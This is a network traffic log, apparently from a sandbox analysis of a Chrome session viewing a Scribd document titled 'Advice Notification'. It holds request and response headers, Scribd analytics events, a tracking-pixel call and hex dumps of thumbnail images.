                                                                                                                                                                                                                                                                                                                                                                                        Age: 177894
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100025-CHI, cache-ewr-kewr1740074-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 32, 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522371.468500,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC1378INData Raw: 52 49 46 46 1e 1c 00 00 57 45 42 50 56 50 38 20 12 1c 00 00 30 61 00 9d 01 2a 95 00 c6 00 3e 6d 2c 92 45 a4 22 a1 97 8b ed f8 40 06 c4 b6 1b 80 1f f3 a5 00 19 42 e0 07 e0 07 74 f6 c2 eb 1f 8e df 95 5f 2a 95 9f ed 1f 8f fd 8b 75 d5 d4 1e 50 3c a7 fe c7 fb c7 e5 57 cc ef ef ff ee 7f c6 7b 85 fc f1 ff 47 dc 03 f5 67 f5 77 fc 37 bf 1f f4 1f ec ff d5 7b 83 fe a9 fe 37 fe 37 ed 1f c0 0f e9 1f da bf 67 3d df ff cc ff cf ff 69 ee 23 fb 2f f8 8f d8 8f f9 1f 20 1f d1 ff c3 ff e6 f6 91 ff 9f ec 19 fe 3f fe 57 b0 6f ec a7 ff 9f 5d 3f dc 6f 83 8f ee 1f f4 bf 70 be 04 ff 6c bf fd 7f c0 f7 00 ff ff ed 9b fc 03 ff ff 5a 7f 56 bb 09 ff 29 f9 45 e7 8f 98 af 84 c9 9b c1 8d 4d 7e 67 f7 fb f9 5f e1 3c f0 ff 4d fd ef c6 3f 89 ff e8 fa 84 7e 41 fc e7 75 b7 63 f3 08 f6 cf ee 7e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFWEBPVP8 0a*>m,E"@Bt_*uP<W{Ggw7{77g=i#/ ?Wo]?oplZV)EM~g_<M?~Auc~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC1378INData Raw: 66 b8 c3 6b 25 c2 da 16 3d cb 8c da 97 74 19 2d c9 25 a2 03 cc 7c 94 5e 42 2f 1d 14 37 fe 6b a3 f8 86 8a aa ba 5d 8f a5 5d a1 42 ab 95 cb 52 5f a2 0b b8 3b 48 37 f9 98 b9 65 38 f3 5d 86 af d1 7c 14 cf d4 cd 48 ff da 2b c8 07 57 b5 19 53 29 04 96 9f f3 62 12 8c 48 b5 aa 8e 00 05 f8 71 a7 fe 00 84 81 5b 22 5a 4b da 9c 7b ce 02 b2 6f dc 18 9b 32 de 3e 5c 8f 59 a8 26 7a e1 df 20 06 09 27 3b 04 de e7 ab d8 fc a9 23 24 7a b0 11 5f 44 9c 6e 6d 78 8d a9 5d b2 45 76 a8 4f 2f 14 c4 a7 c9 09 9e cd 2b 32 8e 2d a0 01 c8 7d b9 fc af 9d e9 b4 5e 17 e8 b9 27 20 49 dd f8 9d 0e a7 1d 06 bc 71 e8 77 38 ce 62 54 13 fb 52 fd e9 e9 a9 9f 9f 75 bf 85 bf eb 7d 62 28 c7 bb f4 d4 16 5a 1e e9 00 04 13 0c d2 2e c0 ca b2 fc 79 58 fa c7 e5 31 c5 38 a6 24 3b 34 ba 70 5a d1 a0 ce 30 bc
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fk%=t-%|^B/7k]]BR_;H7e8]|H+WS)bHq["ZK{o2>\Y&z ';#$z_Dnmx]EvO/+2-}^' Iqw8bTRu}b(Z.yX18$;4pZ0
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC1378INData Raw: 53 5f bd a2 16 da 28 99 c6 ba 17 a8 e4 85 06 13 33 b0 26 e6 66 96 38 96 c0 d7 7f ca 53 9c 29 3a 30 c3 2c 62 b1 8b 7c 6b d6 6a f0 35 42 d6 f5 c1 18 59 6c 8e cd 72 43 83 fd 05 33 54 0b 7e 17 09 17 f9 75 73 33 3b d9 0f ef c1 ba 06 d6 f9 51 5f 9f fb a6 23 30 89 12 f4 e6 1e 0e 01 48 67 80 1e f9 5d 5c 68 75 23 39 d8 ac 66 d0 ee b9 93 a7 7c 5b ac c3 8a 93 ae ee f1 3a 42 18 bf 22 11 93 73 9d 56 01 0d 12 f1 8c 3d e9 93 9a f9 d0 82 9c 35 49 97 03 4f 92 3d 66 20 61 3f 9a 91 87 6f 4f 39 b9 34 d1 19 88 4a e1 68 92 5b f8 5a b0 40 e3 04 8a fd 6e 95 a3 78 f1 ae 97 b7 2a 1a 92 99 e4 9f 47 5c c7 45 5e 3b 7e 29 8f a8 23 5c 8e 05 d7 57 53 ae 67 28 57 df 69 9b 4b 25 87 30 25 5d 79 63 6a 7d 2c 54 e7 b4 f8 2e cc 3e 84 21 70 7b bb 62 1a f2 d8 fa 76 f3 4d 14 ff b1 1a be b8 8b 25
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: S_(3&f8S):0,b|kj5BYlrC3T~us3;Q_#0Hg]\hu#9f|[:B"sV=5IO=f a?oO94Jh[Z@nx*G\E^;~)#\WSg(WiK%0%]ycj},T.>!p{bvM%
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC1378INData Raw: 85 28 07 25 5d b6 71 75 70 35 2d 73 a3 ef 23 fe 47 4e 29 82 56 4b b0 e3 c9 b4 cb 38 f2 01 b3 1e 4f d8 a9 81 94 1f e2 a8 29 49 91 98 9f d8 dc 83 1f 1a 8a 54 51 de 76 0f d6 02 33 77 f5 de c4 76 ca 9c 28 c8 4b 60 1f 16 df 04 4c a5 39 1a 35 76 64 5c 19 b4 7f 99 5c 62 2c 2c 5e ab 8c 9e b2 11 8b d3 8e e2 60 3d 66 22 01 c4 87 9f 35 4d 9e 09 54 77 f2 c1 67 68 31 de 9c c0 58 e3 ca 6a e4 03 2a 43 51 22 da 8a a0 5b 1b ba 59 be d1 a6 dc 1d 4c ad 71 72 68 ac f0 e8 1a a4 6e 6b a7 8d 49 72 7e d3 75 e1 03 3b 23 de 1c 9a d2 43 29 1b d1 98 3f 64 ba c5 e5 5b 07 38 b3 c2 bf 16 ec 94 db 9a 09 79 53 76 30 41 5d 72 c2 ee a2 01 c3 96 1c f4 6c 85 3c f8 16 7a 49 38 19 c3 05 02 c9 ed 5c 50 45 01 c0 90 8c fa 43 7e 60 e0 df 3c 96 14 30 a5 03 aa a1 4c 3f c7 7b 47 40 9a 74 cd 3e 7e 6e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (%]qup5-s#GN)VK8O)ITQv3wv(K`L95vd\\b,,^`=f"5MTwgh1Xj*CQ"[YLqrhnkIr~u;#C)?d[8ySv0A]rl<zI8\PEC~`<0L?{G@t>~n
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC1378INData Raw: da 3b 83 3a 83 d8 bd 57 e9 18 4a 3d ce 16 bb 85 b3 b5 67 fb a4 22 e0 d1 6a fc 81 3f 12 d5 36 3a 49 3d ca 79 f6 28 97 bf 7c 42 f6 2c 1e 01 fb a8 51 d4 96 e9 f2 23 6d 17 e7 2a 2e 42 8d ee 42 34 1c cb aa a8 6c 6c 72 f2 9a 23 ae a0 c9 d4 20 09 e2 f1 5c 98 b0 75 27 5e 4f 9a 02 57 1a 44 e5 47 d8 a7 ce 21 73 7f 80 c0 c9 1b 4e ba ad 32 58 16 98 29 0d fd 6b e4 57 6d c1 93 32 d2 d3 22 1f e7 90 85 0d ea f8 f5 fd b1 55 e3 de 65 ce cf 90 e5 9e 62 57 33 2d d1 f9 16 36 cb 55 cb 31 45 3f fb 7e 14 58 2f c2 5b 8a ce 30 f7 12 c6 06 7d b2 03 14 96 51 e4 9b a9 e1 39 bf ec 77 60 5c 73 2c 88 19 01 4b ab d7 e3 4b ee d8 14 da 6c 6a 0d dd 9d 53 8e 2a 7b 47 57 57 bc 82 b7 b9 42 7b 5e 2b 94 3b 5b bc 30 a7 b6 de c9 9f 27 f0 22 3a 16 21 d9 44 ec b0 6c 65 96 be 0c e3 94 fe bf 96 d7 f1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ;:WJ=g"j?6:I=y(|B,Q#m*.BB4llr# \u'^OWDG!sN2X)kWm2"UebW3-6U1E?~X/[0}Q9w`\s,KKljS*{GWWB{^+;[0'":!Dle
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:31 UTC316INData Raw: 0f c2 cd 81 4b f6 ef 38 e6 79 8a c2 e0 95 7f 15 5b 42 f3 4e 83 19 de 43 10 28 6a fc e5 fb ad ef 2e 10 a4 fa 09 d1 18 a2 66 d9 c1 c6 e9 11 b9 ab 2b fc 72 3a 10 1e f6 9f 19 e3 a8 b4 ef a5 81 f4 37 68 5f c7 59 2a 70 3c fa e6 f0 a5 a2 a7 ee 19 bc 4a 2f 1e 29 ab 79 bd 02 f4 98 64 4c d4 4d 89 15 3e 14 75 d6 65 11 93 db 89 b9 f9 b2 a5 22 53 63 c3 85 d2 0d b1 31 32 22 b7 8b 54 0a 9d 7f de 95 30 9e 0e 4f fd c6 de 2f 59 dc 5b 74 23 4a dc 77 b0 53 9d a5 e1 8b 76 a0 5c b6 19 30 4d 4a 83 12 e7 d1 1a 04 d8 f5 98 8b cc d7 4e 65 25 4f 06 0f 06 e9 ea 36 93 14 c2 85 cb 21 4e 43 5e 4b cf 9e 9e df a9 09 d3 71 c5 fc 06 e1 ab a3 5c 5b e5 5d 65 3e 08 80 30 b6 d7 72 a6 4a b6 f0 55 ca 7a 8b 4b a1 54 63 6d a2 a7 6f 83 f2 11 f2 0d cd 2d e7 86 f4 d6 89 0f 54 b5 10 06 d7 26 67 92 85
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: K8y[BNC(j.f+r:7h_Y*p<J/)ydLM>ue"Sc12"T0O/Y[t#JwSv\0MJNe%O6!NC^Kq\[]e>0rJUzKTcmo-T&g


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        60192.168.2.1649795151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC2777OUTPOST /api/v1/events HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: wa.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1658
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uuid%22%3A%22b23932ab-7f9 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1658OUTData Raw: 7b 22 64 6f 63 5f 69 64 22 3a 38 30 31 35 31 39 32 39 31 2c 22 65 76 65 6e 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 66 6f 75 72 67 65 6e 2e 76 69 65 77 63 68 61 6e 67 65 22 2c 22 76 61 6c 75 65 22 3a 22 5b 5b 2d 30 2e 30 35 2c 31 5d 2c 5b 31 2e 30 35 2c 32 5d 5d 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 36 54 32 31 3a 35 39 3a 32 34 2e 37 39 36 5a 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 70 76 22 2c 22 76 61 6c 75 65 22 3a 22 7b 5c 22 63 69 5c 22 3a 5c 22 73 62 64 2f 45 34 43 4b 30 78 63 55 4a 7a 55 64 46 45 52 55 75 66 4c 4c 68 64 6f 3d 5c 22 2c 5c 22 76 69 5c 22 3a 5c 22 38 64 34 62 33 64 64 31 2d 36 32 38 37 2d 34 35 64 38 2d 62 65 31 65 2d 31 34 37 64 30 39 62 65 63 37 37 38 2e 30 5c 22 7d 22 2c 22 74 69 6d 65 73 74 61 6d 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"doc_id":801519291,"events":[{"name":"fourgen.viewchange","value":"[[-0.05,1],[1.05,2]]","timestamp":"2024-12-06T21:59:24.796Z"},{"name":"pv","value":"{\"ci\":\"sbd/E4CK0xcUJzUdFERUufLLhdo=\",\"vi\":\"8d4b3dd1-6287-45d8-be1e-147d09bec778.0\"}","timestamp
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 40
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                                                                                                                        access-control-allow-origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        x-envoy-upstream-service-time: 1
                                                                                                                                                                                                                                                                                                                                                                                        server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740056-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC40INData Raw: 7b 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 6d 65 73 73 61 67 65 22 3a 22 73 75 63 63 65 73 73 22 7d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"status_code":200,"message":"success"}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        61192.168.2.1649796151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC645OUTGET /img/word_document/357813054/149x198/d1d2a4e180/1732363287?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 3922
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "3ViLAbFM+JRV/OMqNMHt2TQB1s0+4c03yHaXpVp/aeo"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=8149 idim=149x198 ifmt=png ofsz=3922 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010212
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 59
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 295080
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100164-CHI, cache-ewr-kewr1740027-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 20, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522373.508873,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 52 49 46 46 4a 0f 00 00 57 45 42 50 56 50 38 20 3e 0f 00 00 90 42 00 9d 01 2a 95 00 c6 00 3e 6d 2e 94 48 24 22 22 21 29 b1 ab b0 80 0d 89 67 6e f9 5a a6 06 88 1e 94 8b 8c 3f 38 29 db 66 31 1e 22 3d 33 fc c0 7f 18 ff 3f eb 1b e8 b3 d0 03 f6 ab d5 77 d4 2f d0 5b f5 9b d3 5f f6 93 e1 13 f7 13 d2 d3 56 e7 a7 3d af ff 93 f0 9f c6 a7 a5 ff 59 fd a1 e5 01 10 ee ca ff 67 fd eb cf 1f f6 1e 06 fc 2b fe ef d4 23 d4 bf e5 bd 18 7e 63 b4 cf 5d f3 02 f6 7b ea ff f2 bc 1c 3f cf f4 2f eb df b0 07 f2 9f eb 5f ee bf 33 bd ee ff 21 e0 53 f6 6f f3 5f b1 9f 00 1f cd 3f bb 7f d8 fe e9 ee bb fd 67 ff 1f f6 be 74 fe a2 fd ab f8 08 fd 81 f4 d7 f6 19 fb 67 ff ff dd 27 f6 6c fd eb 50 75 7f 5a 83 ab fa d4 1d 5f d6 a0 ea fe b5 07 54 00 ad e9 8d 10 29 b9 8b f9 7d 28 c1 0e 46 ba e4 a5
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFJWEBPVP8 >B*>m.H$""!)gnZ?8)f1"=3?w/[_V=Yg+#~c]{?/_3!So_?gtg'lPuZ_T)}(F
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378INData Raw: 62 d8 d2 4e 1f 0f e0 34 00 3d 4c 42 11 19 09 03 e1 fe 74 35 ce 97 57 9d b3 dc 14 40 73 7a 67 6b 17 45 9c 6e 15 e3 11 46 20 d5 ca 62 b4 c8 18 05 16 6d 62 50 d7 b1 f2 4b d5 5d d4 55 fd ab 77 df 53 ae 5c cb 2e 06 b5 ad dc 83 e2 76 6e 9b 2f a2 ca 22 86 bf f2 cf 6e 1e 7b d5 12 d0 96 4c 54 b1 71 bd 46 e7 bd 7d d8 63 3b f5 70 ee 48 c2 7d 83 cf 09 05 3a 3c fb f2 5b 80 b6 c3 46 cf b2 50 e2 22 76 50 4e 2e 15 ce 11 cb 7a 54 b4 6f 49 b0 f0 f0 c0 73 45 fb 78 73 fc 92 e5 fd 35 7e 41 24 58 ff fc 3c fd 5c 11 fd 02 1d 58 8c 1f f8 7f 52 88 6a 83 41 1a 80 16 78 c0 6e 35 84 b0 e3 5d aa af d2 44 0e 0b 0f 79 10 51 b6 41 c1 e4 9a f1 eb a1 ac e0 6f 4c f7 d8 18 78 79 a1 30 7b 82 74 3a 9a d5 f2 e4 14 16 ba 3a ac 46 b8 38 33 c3 69 e1 36 44 ea 10 83 7d 9d 0f 1a 41 9a 9e 5d 63 72 d3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bN4=LBt5W@szgkEnF bmbPK]UwS\.vn/"n{LTqF}c;pH}:<[FP"vPN.zToIsExs5~A$X<\XRjAxn5]DyQAoLxy0{t::F83i6D}A]cr
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1166INData Raw: 64 36 c4 05 ce 18 bd 69 6b 68 cd 34 b5 ef 23 21 49 f5 98 00 1b a4 9c ab cf da fa 17 a7 ec f0 b3 57 0a 89 49 dd cd 0a 4c e2 36 69 1a 00 65 1b 9e 62 a6 76 a9 0b f9 2d dd ce 6a 60 f1 ce 52 7a b6 7b 94 99 b2 9b 94 58 93 c3 7a e9 e3 61 3b 7c 4d 5d da fc 08 c3 df 72 3c c0 58 15 d9 ba 32 64 b5 7b 6b aa f9 af 3e a8 23 ad d0 b7 81 f1 2a 46 55 44 0b 4a 6e 59 a3 8a d0 46 44 7e 75 3a 52 e4 9e 33 46 39 e7 00 83 a3 ac b8 63 b0 a7 01 01 1d dd e4 1d 60 cc 6e 79 5f 90 77 bb 00 e7 cf 5b 43 d9 c3 18 f6 72 d3 8b af 1c 5f 3d c4 12 db df 07 8f fa cb a4 ab 6d 66 a1 19 29 bf 0a 82 14 10 e9 5d 70 5a 56 55 b9 a6 ef c2 9b 34 85 d0 f8 3f e4 10 a0 4f 13 d1 62 43 51 3a e9 19 b4 09 3c da 48 49 50 bf 03 8b 28 6f 67 1b 07 f5 f1 ec 8a e3 13 e2 30 4a 48 1c 15 97 46 00 ad a2 7b 35 d2 6b 16
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: d6ikh4#!IWIL6iebv-j`Rz{Xza;|M]r<X2d{k>#*FUDJnYFD~u:R3F9c`ny_w[Cr_=mf)]pZVU4?ObCQ:<HIP(og0JHF{5k


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        62192.168.2.164979844.221.168.2244436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC1378OUTGET /j?dtstmp=1733522365790&aid=a-05td&se=e30&duid=4b59e25de34b--01jeezr76nste791ys80m8qnan&tv=v3.5.0&pu=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&us_privacy=1-N-&wpn=lc-bundle&wpv=v3.5.0&cd=.scribd.com&c=PHRpdGxlPkFkdmljZSBOb3RpZmljYXRpb24gfCBQREY8L3RpdGxlPjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJBZHZpY2UgTm90aWZpY2F0aW9uIC0gRnJlZSBkb3dubG9hZCBhcyBQREYgRmlsZSAoLnBkZiksIFRleHQgRmlsZSAoLnR4dCkgb3IgdmlldyBwcmVzZW50YXRpb24gc2xpZGVzIG9ubGluZS4gQWR2aWNlIE5vdGlmaWNhdGlvbiI-PGxpbmsgcmVsPSJjYW5vbmljYWwiIGhyZWY9Imh0dHBzOi8vd3d3LnNjcmliZC5jb20vZG9jdW1lbnQvODAxNTE5MjkxL0FkdmljZS1Ob3RpZmljYXRpb24iPjx0aXRsZSBpZD0iNmEzMGQ0MDktNGUyNi00ODQyLWFkNzEtYjFhZDA4ZDE5MzczIj48IS0tLS0-Q2xvc2UgdGhpcyBkaWFsb2c8IS0tLS0-PC90aXRsZT48dGl0bGUgaWQ9ImNkMjJlYmIwLTc2ZTctNDkxOS04OGUzLTViMmE2MWM1MDM4OCI-PCEtLS0tPkNsb3NlIENvb2tpZSBQcmVmZXJlbmNlczwhLS0tLT48L3RpdGxlPg&pv=fcc8441e-bec8-423c-9a94-14aa0e5d1ab4&n3pc=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: rp.liadm.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a; lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC347INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        X-Pixel-Event-Id: 60f0d4ee-fae9-4b7a-b845-eb213731c4ef
                                                                                                                                                                                                                                                                                                                                                                                        set-cookie: lidid=5dc74bfb-52cb-4a49-aaab-46842de7fa2a; Max-Age=63072000; Expires=Sun, 06 Dec 2026 21:59:32 GMT; Path=/j; Domain=.liadm.com; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:32 UTC13INData Raw: 7b 22 62 61 6b 65 72 73 22 3a 5b 5d 7d
